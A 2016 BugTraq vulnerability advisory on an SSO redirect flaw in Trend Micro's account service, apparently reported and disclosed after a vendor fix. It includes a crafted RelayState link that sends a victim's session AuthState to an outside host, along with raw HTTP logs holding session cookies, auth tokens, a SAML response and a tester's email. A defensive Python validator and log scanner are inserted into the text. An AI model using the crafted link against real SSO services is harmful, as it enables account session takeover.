BugTraq
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability Mar 31 2016 12:05PM
Vulnerability Lab (research vulnerability-lab com)

Document Title:
===============
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1694

Trend Micro ID: 1-1-1035080936

Release Date:
=============
2016-03-31

Vulnerability Laboratory ID (VL-ID):
====================================
1694

Common Vulnerability Scoring System:
====================================
6.5

Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los
Angeles, California with global headquarters in Tokyo, Japan, and regional
headquarters in Asia, Europe and the Americas. The company develops
security software for servers, cloud computing environments, and small
businesses. Its cloud and virtualization security products provide cloud
security for customers of VMware, Amazon AWS, Microsoft Azure and vCloud
Air. Eva Chen serves as Trend Micro's chief executive officer, a position
she has held since 2005 when she succeeded founding CEO Steve Chang. Chang
serves as chairman of Trend Micro.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a redirect
and session web vulnerability in the official Trend Micro SSO online
service web-application.

Vulnerability Disclosure Timeline:
==================================
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri
- Evolution Security GmbH)
2016-01-29: Vendor Notification (Trend Micro Security Team)
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]
2016-03-31: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Trend Micro
Product: Account System - (Web-Application) 2016 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A redirect issue that leaks information has been discovered in the
official Trend Micro online-service web-application. The vulnerability
allows an attacker to send a crafted link to the victim. Following the
link (which requires a login) discloses information to the attacker's
web server; in this case the AuthState value is leaked.

The vulnerability is located in SSOService.php. A remote attacker is
able to craft a link whose RelayState parameter points to his own web
server. When the victim clicks the link, the website asks him to log in.
After the login the victim is quietly redirected to that web server. The
preceding request carries the new AuthState in the GET query string, and
that AuthState identifies the user's session. The AuthState is then
exposed to the external server in the Referer header, and the attacker
can use the AuthState value to take over the account session.


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a
privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Send the victim the link
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=
myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2F
my_account%2F&language=EN-US
2. After logging in, the victim is redirected to yahoo.com
3. The AuthState value is exposed in the Referer header sent to the
attacker's website (yahoo.com in this demonstration)
4. Successful reproduction of the vulnerability!
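As an added illustration (not code from this advisory, from Trend Micro or from SimpleSAMLphp), the following Python shows the two defender-side checks that the technical description and the reproduction steps above call for: a fail-closed allow-list validation of the RelayState return URL, of the kind an IdP should apply before redirecting a freshly logged-in user, and a sweep of access-log lines for SSOService.php requests whose RelayState points off-site. ALLOWED_HOSTS, the external host names, the client addresses and the log lines are assumptions constructed for the example; only the first log line mirrors the PoC link quoted above.

```python
"""Allow-list check for a SAML RelayState return URL, plus a scan of web
server access-log lines for SSO requests whose RelayState points off-site.

Added example for this advisory; it is not Trend Micro's or SimpleSAMLphp's
code. ALLOWED_HOSTS, the host names and the log lines are constructed."""
import re
from urllib.parse import parse_qs, urlparse

# Constructed allow-list: the only hosts an SSO login may return the user to.
ALLOWED_HOSTS = frozenset({"account.trendmicro.com", "sso1.trendmicro.com"})


def relay_state_is_safe(relay_state, allowed_hosts=ALLOWED_HOSTS):
    """Return True only for a site-local absolute path or an https URL whose
    host is exactly on the allow-list.

    The value is expected already URL-decoded once, as a web framework hands
    it over. Anything else fails closed, including the shapes that defeat
    naive prefix checks: scheme-relative '//host', userinfo 'https://good@bad',
    backslashes, and look-alike hosts such as 'good.example.bad.example'.
    """
    if not relay_state:
        return False
    if "\\" in relay_state or any(ch in relay_state for ch in "\r\n\t"):
        return False
    if relay_state.startswith("/") and not relay_state.startswith("//"):
        return True  # e.g. /my_account/ on the SSO host itself
    try:
        parsed = urlparse(relay_state)
        if parsed.scheme != "https":
            return False  # covers '//host', 'http:' and still-encoded values
        if parsed.username is not None or parsed.password is not None:
            return False
        return parsed.hostname in allowed_hosts
    except ValueError:  # malformed netloc (e.g. unbalanced IPv6 brackets)
        return False


# Apache/nginx "combined" request line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def flag_external_relay_states(log_lines, allowed_hosts=ALLOWED_HOSTS):
    """Return [(line_no, relay_state)] for SSOService.php requests whose
    RelayState fails relay_state_is_safe(). Usable as a retroactive sweep of
    IdP access logs for crafted links of the kind this advisory describes."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        if "SSOService.php" not in target:
            continue
        query = urlparse(target).query
        # parse_qs percent-decodes each value exactly once
        for value in parse_qs(query, keep_blank_values=True).get("RelayState", []):
            if not relay_state_is_safe(value, allowed_hosts):
                hits.append((line_no, value))
    return hits


# Constructed access-log sample: line 1 mirrors the advisory's PoC link,
# line 2 is a legitimate return URL, line 3 is scheme-relative, line 4 is noise.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Jan/2016:12:20:22 +0000] "GET /signin/tmsaml/idp/'
    'SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237'
    '&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US'
    ' HTTP/1.1" 200 1532',
    '203.0.113.6 - - [29/Jan/2016:12:21:02 +0000] "GET /signin/tmsaml/idp/'
    'SSOService.php?spentityid=myaccount-sp'
    '&RelayState=https%3A%2F%2Faccount.trendmicro.com%2Fmy_account%2F'
    ' HTTP/1.1" 200 1532',
    '203.0.113.7 - - [29/Jan/2016:12:21:40 +0000] "GET /signin/tmsaml/idp/'
    'SSOService.php?spentityid=myaccount-sp'
    '&RelayState=%2F%2Fexternal.example%2F HTTP/1.1" 200 1532',
    '203.0.113.8 - - [29/Jan/2016:12:22:10 +0000] "GET /index.html HTTP/1.1"'
    ' 200 210',
]

if __name__ == "__main__":
    for line_no, value in flag_external_relay_states(SAMPLE_LOG):
        print(f"line {line_no}: off-site RelayState {value!r}")
```

Validating RelayState on the server closes the redirect itself. The second layer is to stop carrying a session-bearing token such as AuthState in a URL at all, or at least to serve the login pages with a Referrer-Policy of no-referrer, so that a later cross-site navigation cannot reveal the URL in the Referer header.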

--- PoC Session Logs [POST & GET] ---
GET
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=
myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2F
my_account%2F&language=EN-US
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[-1] Mime Type[text/html]
Request Headers:
Host[sso1.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0
$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3
Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session
;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; my_username=; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J
9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAA
ABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(n
one);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3
A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22
%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt"
:1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"h
ttp%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2Fproduct
ID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E
717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%2
6SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%
3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684
efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb",
"r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"
MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070;
SimpleSAMLSessionID=28119447668568dc25d9f927a3de8b8d; cmTPSet=Y;
db_sampling_40=other; CMAVID=30051452809679160476046; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fs
ignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%
253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLAuthToken=_14b1a6b84f5a4395934a9852d7f54a891925085f91]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:22 GMT]
Server[Apache/2.2.15 (CentOS)]
Strict-Transport-Security[max-age=63072000; includeSubdomains;
preload]
X-Frame-Options[SAMEORIGIN]
x-content-type-options[nosniff]
Connection[close]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=UTF-8]

POST
https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php
/myaccount-sp
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[368] Mime Type[text/html]
Request Headers:
Host[account.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]

Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spe
ntityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyaho
o.com%2Fmy_account%2F&language=EN-US]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0
$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3
Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session
;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J
9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAA
ABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(n
one);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3
A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22
%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt"
:1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"h
ttp%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2Fproduct
ID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E
717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%2
6SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%
3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684
efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb",
"r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"
MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fs
ignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%
253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLSessionID=01618d37b8c219c72821da79e9405c3f;
SimpleSAMLAuthToken=_a33b2c8d226a1c70d1cf6e4b00d4f6915ce83e9773]
Connection[keep-alive]
Post Data:
SAMLResponse[PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM
6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0Yzp
TQU1MOjIuMDphc3NlcnRpb24iIElEPSJfZGZkMjU2NGNkNjI1NTYzOTBjNDI1ZGJiOTA4YWY
1MDNiOGQ1ZmUwMmJiIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQ
xMjoyMDoyM1oiIERlc3RpbmF0aW9uPSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20
vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXN
wIj48c2FtbDpJc3N1ZXI%2BaHR0cHM6Ly9zc28xLnRyZW5kbWljcm8uY29tL3NpZ25pbi9zY
W1sMi9pZHAvbWV0YWRhdGEucGhwPC9zYW1sOklzc3Vlcj48ZHM6U2lnbmF0dXJlIHhtbG5zO
mRzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjIj4KICA8ZHM6U2lnbmVkS
W5mbz48ZHM6Q2Fub25pY2FsaXphdGlvbk1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cud
zMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPgogICAgPGRzOlNpZ25hdHVyZU1ldGhvZ
CBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhM
SIvPgogIDxkczpSZWZlcmVuY2UgVVJJPSIjX2RmZDI1NjRjZDYyNTU2MzkwYzQyNWRiYjkwO
GFmNTAzYjhkNWZlMDJiYiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvc
ml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnb
mF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzI
wMDEvMTAveG1sLWV4Yy1jMTRuIyIvPjwvZHM6VHJhbnNmb3Jtcz48ZHM6RGlnZXN0TWV0aG9
kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3NoYTEiLz4
8ZHM6RGlnZXN0VmFsdWU%2BSDNlcVhEaWVOWG5YcnBRaUZ4cmxYZ25tbVJnPTwvZHM6RGlnZ
XN0VmFsdWU%2BPC9kczpSZWZlcmVuY2U%2BPC9kczpTaWduZWRJbmZvPjxkczpTaWduYXR1c
mVWYWx1ZT5tTGVPZkpDZFRkQzRPTXp4dVk2NnEvcE91UG5LYUxTS2tBY1Y4RFoxM25iNklSS
EFTV3hVL3dlZE96OU9WaXN6Y2lTN0h6dlpSQ2djQXo3amgwdTlpazlmam4yNE5PR09ObjZyS
G9ra0xQaXY4N2FpUWMvSkN6emd1M1pmQzcrV3pXOXY4QW5DZjIxWmZ6RDArWDZyb3lvLzkrQ
kVXVmtJVmkzNklEWVdWOFJSeXVqTVFQUFQxZ3NXYTVXUzQ3aE5WUmdZcyt3YmlzbklGMG81T
WovaWlUdjdobUZaQ2VDTWljMm03RENQM2lnQlR3R0hrZnpsUC9FdldGcXJldnV3clZkVS9VS
3FDRjltcXNjeG5INWE5YkNxZmU2ekIzK2wzdHZkSDgwd0Z3Tkg0aldvSWRXY1hPOTZEbUQ2M
Es0QUQ1YVpIcW45Uk9YR1JwaUNyanhRL0E9PTwvZHM6U2lnbmF0dXJlVmFsdWU%2BCjxkczp
LZXlJbmZvPjxkczpYNTA5RGF0YT48ZHM6WDUwOUNlcnRpZmljYXRlPk1JSURGRENDQWZ5Z0F
3SUJBZ0lKQUtoSmdOUDAvZzZhTUEwR0NTcUdTSWIzRFFFQkJRVUFNQkF4RGpBTUJnTlZCQU1
UQlZSbGNuSmhNQjRYRFRFeE1ERXdNekF5TURFME4xb1hEVEl3TVRJek1UQXlNREUwTjFvd0V
ERU9NQXdHQTFVRUF4TUZWR1Z5Y21Fd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F
3Z2dFS0FvSUJBUURad2FJSmVwdHJJaVV4WjVXbDVMVVEvS0VpbEtPRmRZTWdTSjg0RkxDRTN
XYlk2U1NWcURqWmYvcEM1dU4waFg4R0xPL3Z2UExVaGFHa1ZpdXhzSVRYM1VOUThLT1VlVW1
lMHBVb1lFSWxFbjdJRmZuR29SQlV1eDJaTkVXVWRXelV3Z3RrR2dqRzhnTnROTGlnT3ZJN1Z
PTndPZEM3bzZ0TUlHWm12azA1NFZLN2ZKMTkyTTJYNnNmay9YQnBicE5NWk5hQWRrR2dISlJ
qNk9UR2I5QkFPbzR3M2E3RTd0eVRveEd2czFpQWtQalg1SXE2NGltTFdnOW1OWjMvNkpZOHV
hMkVpcXZhU0lsSHFZZzNJNjA2OEdCYlhZeDJtZmNLdlNFbTBwdDFoTm0zOExGdVVJNC9TQm1
vVDFKeXRLcTIvQnNLc2o3RnZDWkRYck5Xb1NRcEFnTUJBQUdqY1RCdk1CMEdBMVVkRGdRV0J
CUzF3OU1HSWRxMmQ2MmlVSkJFKzdLem5xNTFOVEJBQmdOVkhTTUVPVEEzZ0JTMXc5TUdJZHE
yZDYyaVVKQkUrN0t6bnE1MU5hRVVwQkl3RURFT01Bd0dBMVVFQXhNRlZHVnljbUdDQ1FDb1N
ZRFQ5UDRPbWpBTUJnTlZIUk1FQlRBREFRSC9NQTBHQ1NxR1NJYjNEUUVCQlFVQUE0SUJBUUF
QbDFtb0hUTGg1M3BkOGdhVU9uY1FJUFB6dFBvR1NiVURpclA2OFk5SVhGYmwwd3I3NnlFK0R
OYys1cEExK0xZNDkvdjBPZ3BuTXY3UGlPTFhMQzNhdnpKVFhkSW9GS2Z2Mno3T24zaEp1d3E
yUHpacHF4RXVzVEdHSkRHaW9BSnJSOU1PSzQ5Q1hVYmdaMTVvY0ZkUXVpays5ZDJXaHJqQW1
ueEtLbVVJZWxOOEpWVjFTQWhwOUpjN2NiZTJJZVl0cFViSyt0QnVROFFvT01tTUtxTEh3UE5
ad2RYT0o1NWFsNHBLT3VzVTJSOXpyZnREWXlFUU1KOHVIZkdCSzZtYnoxWEFDOG9QUW5FQ2V
kS0I4a3I0eG9md09aWjRCSmNZZDhNQ3ptNUNXRmtBRHljQTRrNlVvd1pnODY0dWFEbk1lZ2V
xN1Vwd3NlZks3RzFJVzdpSzwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BP
C9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1scDpTdGF0dXM%2BPHNhbWxwOlN0YXR[...]%2BCiAgICA8ZHM6U
2lnbmF0dXJlTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94b
Wxkc2lnI3JzYS1zaGExIi8%2BCiAgPGRzOlJlZmVyZW5jZSBVUkk9IiNfOGE1MTYzMzc3NWI
xNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIj48ZHM6VHJhbnNmb3Jtcz48ZHM6VHJ
hbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI2V
udmVsb3BlZC1zaWduYXR1cmUiLz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d
3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPC9kczpUcmFuc2Zvcm1zPjxkc
zpEaWdlc3RNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htb
GRzaWcjc2hhMSIvPjxkczpEaWdlc3RWYWx1ZT5sbk1xNmtkUHdCdTJ3WE04cjRZeEdqNGRMU
Fk9PC9kczpEaWdlc3RWYWx1ZT48L2RzOlJlZmVyZW5jZT48L2RzOlNpZ25lZEluZm8%2BPGR
zOlNpZ25hdHVyZVZhbHVlPmpZbkxvblhIdEdCOGlxODRQZFpXOWpFdzJndWRxM0tEQ3FyMGt
EQjl4TW4xUXE3TG1FQ3B6cUFRei93ZFFVSUx6cHlRNFgvQWREME5nTFJudk1nK0dEWmNjRWZ
vUWhTVC9VSithdmJHVFAvMTFrM2Mvczl5c0ZwcjlKSG5LOU9uMkUxUVlBeXdEMnhIWHE4NnZ
jNEU1YjVOYzM4MFozeUpkYi8yNmwxQllrWm9wV3ltMGY4L0EzUmJENlJNdkFBK1VPajUwK0F
TcnMwa0N3SEdJSllCS2hwM3BwQXhPMWg3bkNqVGUremx2elpOV3RFTDNtOFpRQjhSckhQVU9
CR2FZdjZTQTBHNDBRNkFyeE4yR3BHVjJENzN5MWprQ2ZSK0Q3d0RqUTMrRlBPekozNGo0L2h
aUi9seWJqeFRqTkFNUVpDbWk5UFM2dzNXcTJDL3EydHo3Zz09PC9kczpTaWduYXR1cmVWYWx
1ZT4KPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUl[...]%2BPC9kc
zpYNTA5RGF0YT48L2RzOktleUluZm8%2BPC9kczpTaWduYXR1cmU%2BPHNhbWw6U3ViamVjd
D48c2FtbDpOYW1lSUQgU1BOYW1lUXVhbGlmaWVyPSJteWFjY291bnQtc3AiIEZvcm1hdD0id
XJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOm5hbWVpZC1mb3JtYXQ6dHJhbnNpZW50Ij5fN
WVkYmFkMzJmYzYyNWM4Y2VjZWM0MjRmZGQzYmE5ZGY0NmM5ZWY4OWVjPC9zYW1sOk5hbWVJR
D48c2FtbDpTdWJqZWN0Q29uZmlybWF0aW9uIE1ldGhvZD0idXJuOm9hc2lzOm5hbWVzOnRjO
lNBTUw6Mi4wOmNtOmJlYXJlciI%2BPHNhbWw6U3ViamVjdENvbmZpcm1hdGlvbkRhdGEgTm9
0T25PckFmdGVyPSIyMDE2LTAxLTI5VDEyOjI1OjIzWiIgUmVjaXBpZW50PSJodHRwczovL2F
jY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWw
yLWFjcy5waHAvbXlhY2NvdW50LXNwIi8%2BPC9zYW1sOlN1YmplY3RDb25maXJtYXRpb24%2
BPC9zYW1sOlN1YmplY3Q%2BPHNhbWw6Q29uZGl0aW9ucyBOb3RCZWZvcmU9IjIwMTYtMDEtM
jlUMTI6MTk6NTNaIiBOb3RPbk9yQWZ0ZXI9IjIwMTYtMDEtMjlUMTI6MjU6MjNaIj48c2Ftb
DpBdWRpZW5jZVJlc3RyaWN0aW9uPjxzYW1sOkF1ZGllbmNlPm15YWNjb3VudC1zcDwvc2Ftb
DpBdWRpZW5jZT48L3NhbWw6QXVkaWVuY2VSZXN0cmljdGlvbj48L3NhbWw6Q29uZGl0aW9uc
z48c2FtbDpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTYtMDEtMjlUMTE6NTE6M
zlaIiBTZXNzaW9uTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDIwOjIwOjIzWiIgU2Vzc2lvb
kluZGV4PSJfNzRhNjY1Y2I5NmE2ZDY0ZTQyZmE1YjhkNTAyYmRkYTEwNzZkMTQyMDhmIj48c
2FtbDpBdXRobkNvbnRleHQ%2BPHNhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc
2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmQ8L3NhbWw6QXV0aG5Db
250ZXh0Q2xhc3NSZWY%2BPC9zYW1sOkF1dGhuQ29udGV4dD48L3NhbWw6QXV0aG5TdGF0ZW1
lbnQ%2BPHNhbWw6QXR0cmlidXRlU3RhdGVtZW50PjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc
2VyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6Y
XR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ie
HM6c3RyaW5nIj5zYW1pckBldm9sdXRpb24tc2VjLmNvbTwvc2FtbDpBdHRyaWJ1dGVWYWx1Z
T48L3NhbWw6QXR0cmlidXRlPjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudE5hb
WUiIE5hbWVGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphdHRybmFtZS1mb
3JtYXQ6YmFzaWMiPjxzYW1sOkF0dHJpYnV0ZVZhbHVlIHhzaTp0eXBlPSJ4czpzdHJpbmciP
nNhbWlyQGV2b2x1dGlvbi1zZWMuY29tPC9zYW1sOkF0dHJpYnV0ZVZhbHVlPjwvc2FtbDpBd
HRyaWJ1dGU%2BPHNhbWw6QXR0cmlidXRlIE5hbWU9IkNvbnN1bWVyQWNjb3VudElEIiBOYW1
lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJ
hc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj41MDE5NzM
3Mzwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ
1dGVTdGF0ZW1lbnQ%2BPC9zYW1sOkFzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg%3D%3D]

RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:24 GMT]
Server[Apache]

Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e2
1d;
path=/; httponly]
Location[https://yahoo.com/my_account/]
Pragma[no-cache]
Cache-Control[no-cache, must-revalidate]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Frame-Options[SAMEORIGIN]
Content-Length[368]
Connection[close]
Content-Type[text/html; charset=UTF-8]

GET https://yahoo.com/my_account/ Load Flags[LOAD_DOCUMENT_URI
LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[382] Mime
Type[text/html]
Request Headers:
Host[yahoo.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]

Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuse
rpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%
3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fs
